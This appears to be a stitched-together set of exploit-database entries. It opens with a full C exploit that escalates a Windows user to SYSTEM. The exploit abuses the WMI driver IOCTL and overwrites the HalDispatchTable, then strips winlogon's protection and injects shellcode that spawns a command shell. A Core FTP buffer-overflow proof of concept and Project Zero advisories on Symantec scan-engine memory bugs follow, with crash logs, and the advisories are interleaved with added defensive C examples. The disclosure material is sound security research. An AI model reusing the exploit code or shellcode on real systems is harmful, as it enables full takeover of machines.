#define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)
typedef ULONG(__stdcall *g_ZwMapUserPhysicalPages)(PVOID, ULONG, PULONG);
typedef NTSTATUS(_stdcall *_NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
typedef NTSTATUS(_stdcall *_NtQueryIntervalProfile)(KPROFILE_SOURCE ProfilSource, PULONG Interval);
DWORD g_HalDispatchTable = 0;
void* kHandle;
HWND g_window = NULL;
const WCHAR g_windowClassName[] = L"Victim_Window";
WNDCLASSEX wc;
PSHAREDINFO g_pSharedInfo;
PSERVERINFO g_pServerInfo;
HANDLEENTRY* g_UserHandleTable;
LRESULT CALLBACK WProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
DWORD getProcessId(wchar_t* str)
{
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
DWORD PID;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap);
return 0;
}
do
{
if (!wcscmp(pe32.szExeFile, str))
{
wprintf(L"Process: %s found\n", pe32.szExeFile);
PID = pe32.th32ProcessID;
return PID;
}
} while (Process32Next(hProcessSnap, &pe32));
return 0;
}
void Launch()
{
void* pMem;
char shellcode[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x00";
wchar_t* str = L"winlogon.exe";
DWORD PID = getProcessId(str);
HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
BOOL leakHal()
{
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
PRTL_PROCESS_MODULES pModuleInfo;
DWORD ntoskrnlBase;
DWORD HalDTUser, HalDTOffset;
HMODULE userKernel;
pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pModuleInfo == NULL)
{
printf("Could not allocate memory\n");
return FALSE;
}
NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
if (userKernel == NULL)
{
printf("Could not load ntoskrnl.exe\n");
return FALSE;
}
HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
HalDTOffset = HalDTUser - (DWORD)userKernel;
g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
return TRUE;
}
BOOL setup()
{
LoadLibraryA("user32.dll");
wc.cbSize = sizeof(WNDCLASSEX);
wc.style = 0;
wc.lpfnWndProc = WProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = NULL;
wc.hCursor = NULL;
wc.hIcon = NULL;
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
wc.lpszMenuName = NULL;
wc.lpszClassName = g_windowClassName;
wc.hIconSm = NULL;
if (!RegisterClassEx(&wc))
{
printf("Failed to register window: %d\n", GetLastError());
return FALSE;
}
g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
if (g_window == NULL)
{
printf("Failed to create window: %d\n", GetLastError());
return FALSE;
}
g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
g_UserHandleTable = g_pSharedInfo->aheList;
g_pServerInfo = g_pSharedInfo->psi;
return TRUE;
}
DWORD leakWndAddr(HWND hwnd)
{
DWORD addr = 0;
HWND kernelHandle = NULL;
for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
{
kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
if (kernelHandle == hwnd)
{
addr = (DWORD)g_UserHandleTable[i].phead;
break;
}
}
return addr;
}
VOID SprayKernelStack() {
g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
if (ZwMapUserPhysicalPages == NULL)
{
printf("Could not get ZwMapUserPhysicalPages\n");
return;
}
BYTE buffer[4096];
DWORD value = g_HalDispatchTable - 0x3C + 0x4;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buffer + i * 4, &value, sizeof(DWORD));
}
printf("Where is at: 0x%x\n", buffer);
ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}
__declspec(noinline) int Shellcode()
{
__asm {
mov eax, kHandle // WND - Which window? Check this
mov eax, [eax + 8] // THREADINFO
mov eax, [eax] // ETHREAD
mov eax, [eax + 0x150] // KPROCESS
mov eax, [eax + 0xb8] // flink
procloop:
lea edx, [eax - 0xb8] // KPROCESS
mov eax, [eax]
add edx, 0x16c // module name
cmp dword ptr[edx], 0x6c6e6977 // 'winl' for winlogon.exe
jne procloop
sub edx, 0x170
mov dword ptr[edx], 0x0 // NULL ACL
ret
}
}
int main() {
DWORD dwBytesReturned;
HANDLE threadhandle;
WMIRECEIVENOTIFICATION buffer;
CHAR OutPut[1000];
if (!setup())
{
printf("Could not setup window\n");
return 0;
}
PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
kHandle = (void*)leakWndAddr(g_window);
memset(userSC, 0x41, 0x1000);
memcpy(userSC, Shellcode, 0x40);
if (!leakHal())
{
printf("Could not leak Hal\n");
return 0;
}
printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);
DWORD value = (DWORD)userSC;
PBYTE buff = (PBYTE)&buffer;
for (int i = 0; i < sizeof(buffer) / 4; i++)
{
memcpy(buff + i * 4, &value, sizeof(DWORD));
}
printf("What is at: 0x%x\n", buff);
buffer.HandleCount = 0;
buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
buffer.UserModeProcess.Handle = GetCurrentProcess();
HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDriver != INVALID_HANDLE_VALUE) {
SprayKernelStack();
if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
return 1;
}
}
_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
ULONG result;
KPROFILE_SOURCE stProfile = ProfileTotalIssues;
NtQueryIntervalProfile(stProfile, &result);
printf("SYSTEM shell comming\n");
Launch();
printf("All done, exiting\n");
return 0;
}
'''
# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC
# Date: 2016-6-28
# Exploit Author: Netfairy
# Vendor Homepage: http://www.coreftp.com/
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
[+] Type : Buffer overflow
[+] Detail :
[-] This is a typical buffer overflow vulnerability.
[-] Start the application, enter "A"*800 into the path box, then press Enter.
[-] Crash info:
0:008> g
(4d48.4cc8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00440770 ecx=00410041 edx=007c4ee4 esi=00000000 edi=01b1efe8
eip=00410041 esp=0012d6a0 ebp=00410041 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\CoreFTP\coreftp.exe
coreftp+0x10041:
00410041 008b45fc8be5 add byte ptr [ebx-1A7403BBh],cl ds:0023:e5d003b5=??
########generate "A"*800
'''
import struct
junk = b"A" * 800  # bytes, so the "wb" write works on Python 2 and 3
with open("exp.txt","wb") as f :
f.write(junk)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=823
A PowerPoint PPT file is a complicated OLE compound document comprising of a series of streams. The format is described by Microsoft in [MS-PPT].
https://msdn.microsoft.com/en-us/library/office/cc313106(v=office.12).aspx
Symantec have implemented an I/O abstraction layer for seeking within the streams of a compound document, which they use to extract embedded objects like VBA macros and so on. Unfortunately, a bug in this I/O abstraction results in a critical security vulnerability. The bug occurs when a read request can be satisfied from the cache, but from a non-zero start offset. In this case, the request size is always rounded to (CACHE_SIZE - Offset), which may not be correct.
For example, a read request that can be satisfied from the stream cache in these ways:
        +-------------------------+
        |          CACHE          |
        +-------------------------+
1.              <---------------->   Non-zero offset, but entire cache needed.
2.      <---------->                 Zero offset, but not the entire cache.
3.      <------------------------>   Entire cache.
4.             <------>              Non-zero offset and not entire cache.
All of these cases work fine except 4, where a buffer overflow occurs, because the request is rounded up to (CACHE_SIZE - Offset). It seems incredible that this bug wasn't found during testing or even on ITW documents just by chance. Nevertheless, by carefully constructing a PowerPoint file with a series of records that massage the cache, we can trigger a stack buffer overflow of attacker controlled data.
The easiest way to do this is via PPFindRecSet in libdec2ss (this is part of ccScanw.dll on Windows). Early on when processing powerpoint documents Symantec attempt to find the last edit via RT_UserEditAtom, then extract a set of records for RT_List and RT_ExternalObjectList allowing us to massage the stream cache appropriately.
Naturally, Symantec disable /GS on Windows and do not use -fstack-protector, making exploitation absolutely trivial. The attached document redirects execution to 0x41414141 reliably on Windows.
0:065> g
(1074.a14): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=000025a0 ecx=00000200 edx=000025a0 esi=0396e358 edi=00002524
eip=41414141 esp=056df558 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:065> lmv m ccScanW
start end module name
65820000 65a4f000 ccScanw (deferred)
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
The fix is simply to round up requests to MIN(RequestSize, CACHE_SIZE).
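The four cache cases above, modelled as an added example (not Symantec's code): a toy stream cache whose copy length is computed either the way the report describes (request size honoured at offset 0, always "rounded" to CACHE_SIZE - Offset otherwise) or clamped to both the request and the bytes left in the cache. The read routine reports an overflow instead of committing it, so it is an oracle for the bug rather than a trigger; CACHE_SIZE and the layout are assumptions chosen for readability.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy model (constructed for this example): the cache holds CACHE_SIZE
 * bytes of the stream starting at stream offset cache_base. */
#define CACHE_SIZE 32

struct stream_cache {
    size_t cache_base;            /* stream offset of cache[0] */
    uint8_t cache[CACHE_SIZE];
};

/* Bytes the buggy layer copies for a request the cache can satisfy:
 * at a zero start offset the request size is honoured, at a non-zero
 * offset it is always "rounded" to CACHE_SIZE - off (the report's bug). */
size_t buggy_copy_len(size_t off, size_t request)
{
    if (off == 0)
        return request < CACHE_SIZE ? request : CACHE_SIZE;
    return CACHE_SIZE - off;
}

/* Corrected length: never more than requested, never past the cache end. */
size_t fixed_copy_len(size_t off, size_t request)
{
    size_t avail = CACHE_SIZE - off;
    return request < avail ? request : avail;
}

/* Serve a cached read into dst (dst_len bytes, sized by the caller for the
 * request). Returns bytes copied, -2 if the request is not a cache hit,
 * or -1 if the computed copy length would overrun dst, i.e. the stack
 * overflow described above. The overflow is reported, never performed. */
long cached_read(const struct stream_cache *c, size_t stream_off,
                 uint8_t *dst, size_t dst_len, size_t request,
                 size_t (*copy_len)(size_t, size_t))
{
    if (stream_off < c->cache_base || stream_off - c->cache_base >= CACHE_SIZE)
        return -2;                         /* not in cache: out of scope here */
    size_t off = stream_off - c->cache_base;
    if (request > CACHE_SIZE - off)
        return -2;                         /* cannot be satisfied from cache */
    size_t n = copy_len(off, request);
    if (n > dst_len)
        return -1;                         /* would overflow caller's buffer */
    memcpy(dst, c->cache + off, n);
    return (long)n;
}

/* true if a read of `request` bytes at cache offset `off` into a buffer
 * sized exactly for the request overflows under the given length rule. */
bool case_overflows(size_t off, size_t request, size_t (*copy_len)(size_t, size_t))
{
    struct stream_cache c = { .cache_base = 0x100 };
    for (size_t i = 0; i < CACHE_SIZE; i++)
        c.cache[i] = (uint8_t)i;
    uint8_t dst[CACHE_SIZE];               /* backing store; dst_len = request */
    return cached_read(&c, c.cache_base + off, dst, request, request, copy_len) == -1;
}
```

Case 4 (non-zero offset, partial cache) is the only one where the buggy rule copies more than the caller asked for; the clamped rule is the MIN() fix from the report applied to the bytes actually remaining in the cache.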
I verified this bug exists on the following products:
* Norton Antivirus (All Platforms)
* Symantec Endpoint (All Platforms)
* Symantec Scan Engine (All Platforms)
* Symantec Email Security (All Platforms)
And probably all other Symantec and Norton branded products.
NOTES:
PPGetVBAEmbedListInfo() uses PPFindRecSet(), which is definitely the easiest way to exploit this. The prototype is something like:
int PPFindRecSet(tagSS_STREAM *stream,
unsigned StartOffset,
unsigned EndOffset,
short count,
short *RequiredRecordTypes,
unsigned *RecordOffsets,
int *RecordLengths);
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40037.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=821
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. Simple fuzzing of zip archives discovered missing bounds checks in the routine ALPkOldFormatDecompressor::UnShrink, used to decode Zip archives.
The routine uses a 16-bit value read from the file to index a 256 element array without any bounds checking; the attached testcase should demonstrate this reliably. I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
(534.700): Access violation - code c0000005 (!!! second chance !!!)
eax=00003000 ebx=00003000 ecx=00003000 edx=00002000 esi=16adeb58 edi=16ad8b1b
eip=6ba47ec3 esp=16ad6af0 ebp=16adeb20 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
ccScanw!filelengthi64+0x3af63:
6ba47ec3 66399445fcbfffff cmp word ptr [ebp+eax*2-4004h],dx ss:002b:16ae0b1c=????
0:071> ub
ccScanw!filelengthi64+0x3af3f:
6ba47e9f 8bb5ec7fffff mov esi,dword ptr [ebp-8014h]
6ba47ea5 8bc7 mov eax,edi
6ba47ea7 8985e07fffff mov dword ptr [ebp-8020h],eax
6ba47ead e96d010000 jmp ccScanw!filelengthi64+0x3b0bf (6ba4801f)
6ba47eb2 0fbfc3 movsx eax,bx
6ba47eb5 ba00200000 mov edx,2000h
6ba47eba 8dbdfb9fffff lea edi,[ebp-6005h]
6ba47ec0 0fb7cb movzx ecx,bx
0:071> lmv m ccScanw
start end module name
6b930000 6bb5f000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40036.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=819
Simple fuzzing found an integer overflow in the dec2tnef library. This allocation from Attachment::setDataFromAttachment() doesn't verify that the attacker controlled value doesn't wrap:
.text:000227B8 8D 42 01 lea eax, [edx+1]
.text:000227BB 89 85 68 FF FF+ mov [ebp+var_98], eax
.text:000227C1 8B 83 CC FF FF+ mov eax, ds:(_ZSt7nothrow_ptr - 42CFCh)[ebx]
.text:000227C7 89 44 24 04 mov [esp+4], eax
.text:000227CB 8B 85 68 FF FF+ mov eax, [ebp+var_98]
.text:000227D1 C1 E0 02 shl eax, 2
.text:000227D4 89 04 24 mov [esp], eax
.text:000227D7 89 95 5C FF FF+ mov [ebp+src], edx
.text:000227DD 89 8D 58 FF FF+ mov [ebp+var_A8], ecx
.text:000227E3 E8 54 22 FE FF call __ZnajRKSt9nothrow_t ; operator new[](uint,std::nothrow_t const&)
That's (count + 1) * 4, without any checking that will succeed. The attached testcase reaches this code on Symantec Scan Engine, I'm not sure which other products use this code.
(gdb) bt
#1 0x07e88816 in Attachment::setDataFromAttachment(Item&) () from definitions/Decomposer/libdec2tnef.so
#2 0x07e88abc in Attachment::setAttribute(Item&) () from definitions/Decomposer/libdec2tnef.so
#3 0x07e8a1b4 in TNEFObject::getAttachments(_IO_FILE*, MList&) () from definitions/Decomposer/libdec2tnef.so
#4 0x07e6c1d6 in CTNEFArchive::Open(char const*) () from definitions/Decomposer/libdec2tnef.so
#5 0x07e6ae5f in CTNEFEngine::OpenArchive(CTNEFArchive*, bool*) () from definitions/Decomposer/libdec2tnef.so
#6 0x07e6b8c0 in CTNEFEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from definitions/Decomposer/libdec2tnef.so
#7 0x063d07b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
#8 0x063d13cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
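The (count + 1) * 4 computation above, as an added example (not Symantec's code) on a 32-bit model: the unchecked form wraps silently, the check compares the exact value against what 32 bits can hold, and the hardened allocator refuses counts that would wrap instead of handing back a too-small block. Function names are this example's own.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

/* The allocation size as the 32-bit build computes it: (count + 1) * 4 in
 * 32-bit unsigned arithmetic, which wraps silently on overflow. */
uint32_t unchecked_alloc_size(uint32_t count)
{
    return (count + 1u) * 4u;
}

/* true if the 32-bit computation above wraps for this count: the exact
 * value is computed in 64 bits and compared against the 32-bit range. */
bool alloc_size_wraps(uint32_t count)
{
    uint64_t exact = ((uint64_t)count + 1u) * 4u;
    return exact > UINT32_MAX;
}

/* Hardened version: both count + 1 and (count + 1) * 4 must fit in
 * 32 bits, otherwise return NULL rather than an undersized array. */
uint32_t *alloc_entries(uint32_t count)
{
    if (count == UINT32_MAX || count + 1u > UINT32_MAX / 4u)
        return NULL;
    return calloc(count + 1u, sizeof(uint32_t));
}
```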
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40035.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=818
Symantec attempts to clean or remove components from archives or other multipart containers that they detect as malicious. The code that they use to remove components from MIME encoded messages in CMIMEParser::UpdateHeader() assumes that filenames cannot be longer than 77 characters.
This assumption is obviously incorrect, names can be any length, resulting in a very clean heap overflow.
The heap overflow occurs because Symantec does the cleaning in multiple stages, first changing the Content-Type to "text/plain", then changing the filename to "DELETED.TXT". The problem is that during the first stage of this process, they maintain the existing name but use a buffer prepared for the final name.
Something like:
char *buf = malloc(strlen(NewContentType) + strlen(LengthOfNewEncodedFilename) + 100);
// First change the content-type
strcpy(buf, "Content-Type: ");
strcat(buf, NewContentType);
strcat(buf, "; name=\"");
strcat(buf, OldFileName);
...
UpdateName(buf, NewFileName);
...
This obviously won't work, because it doesn't verify that the old name will fit. I've attached an example MIME message that triggers this code in Symantec Scan Engine.
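The first cleaning stage sized correctly, as an added example (not Symantec's code): the header is measured from the strings actually written, including the old filename, so a 200-character name is as safe as a 10-character one. A second helper computes how far a fixed filename-length assumption (77 in the report) falls short for a given name; names and the "; name=" layout are this example's assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Build the rewritten header line for the first cleaning stage: the
 * Content-Type is replaced while the old filename is kept. The buffer is
 * sized from the strings actually written, not from a fixed assumption
 * about filename length. Returns a malloc'd string (caller frees) or NULL. */
char *build_header(const char *new_content_type, const char *old_name)
{
    const char *prefix = "Content-Type: ";
    const char *name_attr = "; name=\"";
    const char *suffix = "\"";
    /* snprintf(NULL, 0, ...) measures the exact output length. */
    int need = snprintf(NULL, 0, "%s%s%s%s%s", prefix, new_content_type,
                        name_attr, old_name, suffix);
    if (need < 0)
        return NULL;
    size_t len = (size_t)need + 1;
    char *buf = malloc(len);
    if (!buf)
        return NULL;
    /* Cannot truncate, since len came from the same arguments; the return
     * value is still checked rather than trusted. */
    if (snprintf(buf, len, "%s%s%s%s%s", prefix, new_content_type,
                 name_attr, old_name, suffix) != need) {
        free(buf);
        return NULL;
    }
    return buf;
}

/* Bytes by which a buffer sized for assumed_name_len (e.g. 77) falls short
 * of what the rewrite with old_name really needs; 0 when it would fit. */
size_t header_shortfall(const char *new_content_type, const char *old_name,
                        size_t assumed_name_len)
{
    size_t fixed_part = strlen("Content-Type: ") + strlen(new_content_type)
                      + strlen("; name=\"") + strlen("\"") + 1;
    size_t fixed = fixed_part + assumed_name_len;
    size_t actual = fixed_part + strlen(old_name);
    return actual > fixed ? actual - fixed : 0;
}
```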
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40034.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=810
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. It is self-evident from looking at the decomposer code that Symantec have based the RAR decompression on the open-source unrar package from RAR labs (Note: this is permitted by the unrar license).
By comparing Symantec's code to the open source code, I have determined that Symantec are probably using version 4.1.4 of the unrar code, released in January 2012. The most current version is version 5.3.11.
Between the version of unrar that Symantec runs as NT AUTHORITY\SYSTEM to unpack untrusted binaries received over the network and the current version, literally hundreds of critical memory corruption bugs have been resolved.
I have verified that multiple publicly known vulnerabilities affect Symantec, and can result in remote code execution as NT AUTHORITY\SYSTEM on Windows and root on Linux and Mac.
I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
Presumably this affects all other Symantec products using the core Symantec scan engine.
In my opinion, I'm being exceptionally generous considering this issue a new vulnerability and not public information. Frankly, it is astonishing that Symantec do not track new releases of third party code they use. I think you should take this opportunity to check all other third party code you're using to verify you haven't fallen behind.
I've attached a trivial example that modifies an arbitrary index in the PlaceA[] array via Unpack::ShortLZ().
(534.adc): Access violation - code c0000005 (!!! second chance !!!)
eax=14858d00 ebx=07da63e0 ecx=07da65ec edx=fb6e43a0 esi=07da6370 edi=daf72217
eip=6d7b4016 esp=0da8d260 ebp=0da8d27c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
ccScanw!filelengthi64+0x470b6:
6d7b4016 8994be005d0000 mov dword ptr [esi+edi*4+5D00h],edx ds:002b:73b748cc=14858d00
0:052> lm v mccScanw
start end module name
6d690000 6d8bf000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
These bugs are obviously exploitable for remote code execution on all Symantec customer machines as root or SYSTEM.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40031.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=814
The dec2lha library is the library responsible for decompressing LZH and LHA archives. The CSymLHA::get_header() routine has a trivial stack buffer overflow.
.text:00023D91 31 C0 xor eax, eax
...
.text:00023DAE 8D 95 E4 FB FF+ lea edx, [ebp+var_41C]
.text:00023DB4 89 D7 mov edi, edx
.text:00023DC7 66 B9 00 01 mov cx, 100h
.text:00023DCB F3 AB rep stosd
We can see from this initialization that var_41C is a 1024 byte stack buffer, because 0x100 * sizeof(dword) = 1024. But later on in this routine:
.text:0002442C 88 0C 10 mov [eax+edx], cl ; eax = &var_41C edx=index
.text:0002442F 83 C2 01 add edx, 1 ; edx++
...
.text:00024408 81 FA 00 10 00+ cmp edx, 1000h ; if (index > 4096) ...
.text:0002440E 0F 84 E9 02 00+ jz loc_246FD ; oob
The index is checked to see if it's > 4096 bytes, which is incorrect for a 1024 byte buffer. This is most likely a simple programmer's error: bounds checking with the wrong size.
This code is typically run with SYSTEM/root privileges, I'm using Symantec Scan Engine on Linux to reproduce this issue, but all platforms and products using this code (e.g. Symantec Mail Security) are likely affected.
#0 0xf5606d95 in CSymLHA::get_header(SymLHA::_S_LzHeader*) () from libdec2lha.so
#1 0xf5607af4 in CSymLHA::GetEntry(SymLHA::_S_LzHeader*) () from libdec2lha.so
#2 0xf55e83d5 in CLHAEngine::ProcessChildren(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, CSymLHA*) () from libdec2lha.so
#3 0xf55e8a8f in CLHAEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from libdec2lha.so
#4 0xf5c137b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
#5 0xf5c143cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
(gdb) c
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Because Symantec do not use -fstack-protector on Linux, exploitation is remarkably trivial. Exploitation is likely still possible on Windows, but may be more difficult as they do use /GS on that platform.
This issue is remotely exploitable just by receiving an email, visiting a website, and so on.
Proof of Concept:
